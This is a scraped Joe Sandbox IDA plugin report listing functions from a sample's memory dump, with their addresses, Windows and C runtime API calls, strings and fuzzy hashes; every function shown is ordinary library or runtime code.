Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: cee4dfbc3060b83272c6c69a881e0913753ed066e01a54e2792f7b214ce25a22
Instruction ID: c3ad6012927008093152f1f2a1d0b7f1cc5513a4980eac7f912a737cf88caf60
Opcode Fuzzy Hash: cee4dfbc3060b83272c6c69a881e0913753ed066e01a54e2792f7b214ce25a22
Instruction Fuzzy Hash: 4BE0863250812CFBCF122F61DD09F9E7F2AEF84761F008011FC4565161CB768E60AAD0

Function 00958F5A Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00008F66,0095893C), ref: 00958F5F

Memory Dump Source

Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 35b47e85b1b73e30ca16a810e26dae812e19f848e3d7b4671eddb1531375f03d
Instruction ID: 797a2bcf34579c2ae7f5eb5b1b2f4a3c78d1ef05bf33d11f0021a913f2cdc48b
Opcode Fuzzy Hash: 35b47e85b1b73e30ca16a810e26dae812e19f848e3d7b4671eddb1531375f03d
Instruction Fuzzy Hash:

Function 00969720 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00969720

Memory Dump Source

Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 86f215d508164773e8926de740ccf57125d14cf5406c387f584986ce82703e94
Instruction ID: 1abff87ed260bd511520663a9164f4a69b5e99efa659e26a625380f793c1327a
Opcode Fuzzy Hash: 86f215d508164773e8926de740ccf57125d14cf5406c387f584986ce82703e94
Instruction Fuzzy Hash: A2A0113022E208CB83008F30AE0820A3AA8BA88AC0B008028A008C2020EBA08080AA00

Function 00A02B71 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
Instruction ID: 01c80dd39e151df92b115da2693a1a8f2df31cbef649e1215f6dcf0b0e13eb96
Opcode Fuzzy Hash: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
Instruction Fuzzy Hash: 8F81B031604B058FC728DF29D8947AABBE2EFD5314F148A2DD4EA87791D734E849CB44

Function 00963E62 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3be818cf205956922cb42e2948fb7e1fdd6f2e0da355ec83d9b6a1afa0c5ae1d
Instruction ID: e7b88269382302d4adfc4702ae0c161e7b140452acb9cf5c25626a54aea6fad4
Opcode Fuzzy Hash: 3be818cf205956922cb42e2948fb7e1fdd6f2e0da355ec83d9b6a1afa0c5ae1d
Instruction Fuzzy Hash: E4E08C32D11228EBCB25DB88D904A8AF3ECEB88B40B11819AF501D3101C270DF00CBE0

Function 009605AA Relevance: .0, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8f6b386abd769ad1aa34007715f148021cb4ecf1aa09ef3fb483fba9ae76088
Instruction ID: 6a804f04f75bea298c4b8802e6f7a24f9fea52cb944baae3e998cd100a1d124f
Opcode Fuzzy Hash: e8f6b386abd769ad1aa34007715f148021cb4ecf1aa09ef3fb483fba9ae76088
Instruction Fuzzy Hash: FEC08C34002A008BCE2A891692B53A63358E3E2786F84088DE4030B642C61EEC82DA10

Function 009583AE Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 19
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 009583B4
GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 009583C2
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 009583D3
GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 009583E4

Strings

GetCurrentPackageId, xrefs: 009583BC
GetTempPath2W, xrefs: 009583D9
kernel32.dll, xrefs: 009583AF
GetSystemTimePreciseAsFileTime, xrefs: 009583C8

Memory Dump Source

Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
API String ID: 667068680-1247241052
Opcode ID: 0c62fdf2d36796b5facdf842f4334aadc04c4d0b830f476c00352627cd7b7898
Instruction ID: c91ea7d3fba8454d64f6d14a630196c6f81b9741c4c895f05d1c2dc1821d0d44
Opcode Fuzzy Hash: 0c62fdf2d36796b5facdf842f4334aadc04c4d0b830f476c00352627cd7b7898
Instruction Fuzzy Hash: 4FE0E6B357A310DB87109FB4BC0ED563EB4FAC97A53018011F40DD31A0E6B04481EB65

Function 0095BD42 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

type_info::operator==.LIBVCRUNTIME ref: 0095BE61
___TypeMatch.LIBVCRUNTIME ref: 0095BF6F
_UnwindNestedFrames.LIBCMT ref: 0095C0C1
CallUnexpected.LIBVCRUNTIME ref: 0095C0DC

Strings

csm, xrefs: 0095BDEC
csm, xrefs: 0095BE98
csm, xrefs: 0095BD7F

Memory Dump Source

Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2751267872-393685449
Opcode ID: 0c12d7955eb59e83b5db25d8df3fd22f810242587654208ab4ad1e69e933a65f
Instruction ID: b391f12ad02f38fbfd34fb650dd8e0c645c5cd0865eeb365d9650c7d079b5fef
Opcode Fuzzy Hash: 0c12d7955eb59e83b5db25d8df3fd22f810242587654208ab4ad1e69e933a65f
Instruction Fuzzy Hash: C3B187B1800209EFCF18EFA6C881AAEB7B9BF44316F14455AED056B252D331DA59CF91

Function 00966DCC Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 298
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 00967045

Memory Dump Source

Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: 1c50a5e13c7814ae02a4cbfbbf593fecb1040101494f33ec97a3ce8aa388f300
Instruction ID: daf94a0241e1bcfa0d3fcc5d33231daeb100af0aedc967d002c7c2579b5f9cfa
Opcode Fuzzy Hash: 1c50a5e13c7814ae02a4cbfbbf593fecb1040101494f33ec97a3ce8aa388f300
Instruction Fuzzy Hash: 10B13670A0C249AFDB11CFD9C880BBEBBB5BF86318F148169E8549B392D7759D41CB60

Function 0096DCC9 Relevance: 12.2, APIs: 8, Instructions: 248
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCPInfo.KERNEL32(?,?), ref: 0096DD6F
__alloca_probe_16.LIBCMT ref: 0096DE2A
__alloca_probe_16.LIBCMT ref: 0096DEB9
__freea.LIBCMT ref: 0096DF04
__freea.LIBCMT ref: 0096DF0A
__freea.LIBCMT ref: 0096DF40
__freea.LIBCMT ref: 0096DF46
__freea.LIBCMT ref: 0096DF56

Memory Dump Source

Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: 6e4c0a7bff560108155b0899bd726ab8adac3711f6f76836d474e6461b8fadd8
Instruction ID: 92c9fbdd6edf2c17b9c02f939fd1c4389dc364b0a80c032319dd13959bebda41
Opcode Fuzzy Hash: 6e4c0a7bff560108155b0899bd726ab8adac3711f6f76836d474e6461b8fadd8
Instruction Fuzzy Hash: 4371E472F062059BDF21AE948C51BAF7BB99F95310F290415E929BB2C1DA35DC04C7A0

Function 00958084 Relevance: 12.2, APIs: 8, Instructions: 175
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 009580CD
__alloca_probe_16.LIBCMT ref: 009580F9
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00958138
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00958155
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00958194
__alloca_probe_16.LIBCMT ref: 009581B1
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009581F3
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00958216

Memory Dump Source

Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd

Similarity

API ID: ByteCharMultiStringWide$__alloca_probe_16
String ID:
API String ID: 2040435927-0
Opcode ID: b20344576abb64205e180e8dd122c927b940501f3078644f155b81330ea825f4
Instruction ID: 9cee45eb785dbe133c91d921778292639495c82cc2f7a366fb15eec0cb464c97
Opcode Fuzzy Hash: b20344576abb64205e180e8dd122c927b940501f3078644f155b81330ea825f4
Instruction Fuzzy Hash: E551AB7260060AABEF20DF62DC45FAB7BA9FB84792F144425FD15E6190DF348C19DB60

Function 0095B810 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_ValidateLocalCookies.LIBCMT ref: 0095B847
___except_validate_context_record.LIBVCRUNTIME ref: 0095B84F
_ValidateLocalCookies.LIBCMT ref: 0095B8D8
__IsNonwritableInCurrentImage.LIBCMT ref: 0095B903
_ValidateLocalCookies.LIBCMT ref: 0095B958

Strings

csm, xrefs: 0095B8ED

Memory Dump Source

Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 4926af78beddf9b2ff33d5aeab4a107964eea3ee5fb1d373623a69468826816a
Instruction ID: 1c88de7cb34bbf41b30612f621190cac15f53f5d7bc3986217adc9727401ebb1
Opcode Fuzzy Hash: 4926af78beddf9b2ff33d5aeab4a107964eea3ee5fb1d373623a69468826816a
Instruction Fuzzy Hash: A541B574E002189FCF10DF6AC895AAEBBB9EF84325F148155ED199B352D731D909CF90

Function 009638AE Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,009639BB,00000000,00960F07,00000000,00000000,?,?,00963BE5,00000021,FlsSetValue,009737C8,009737D0,00000000), ref: 0096396F

Strings

api-ms-, xrefs: 00963905
ext-ms-, xrefs: 00963919

Memory Dump Source

Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 0c57cc6c80b1351c1a49f0de8fc3234645a59cdbfdfe583849e9b397d6fa65f6
Instruction ID: 3abf425c1faa681dbcb9d101dd8638b7b0ef9a61d542aecc6a717b126669a2ca
Opcode Fuzzy Hash: 0c57cc6c80b1351c1a49f0de8fc3234645a59cdbfdfe583849e9b397d6fa65f6
Instruction Fuzzy Hash: 0921D872A05215FBDB219B60DC41B6A376CAB517B0B248110E91AA7290EB70EF00DEE0

Function 00956CE1 Relevance: 9.1, APIs: 6, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 00956CE8
std::_Lockit::_Lockit.LIBCPMT ref: 00956CF2
int.LIBCPMT ref: 00956D09

Part of subcall function 00952D8F: std::_Lockit::_Lockit.LIBCPMT ref: 00952DA0
Part of subcall function 00952D8F: std::_Lockit::~_Lockit.LIBCPMT ref: 00952DBA

codecvt.LIBCPMT ref: 00956D2C
std::_Facet_Register.LIBCPMT ref: 00956D43
std::_Lockit::~_Lockit.LIBCPMT ref: 00956D63

Memory Dump Source

Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
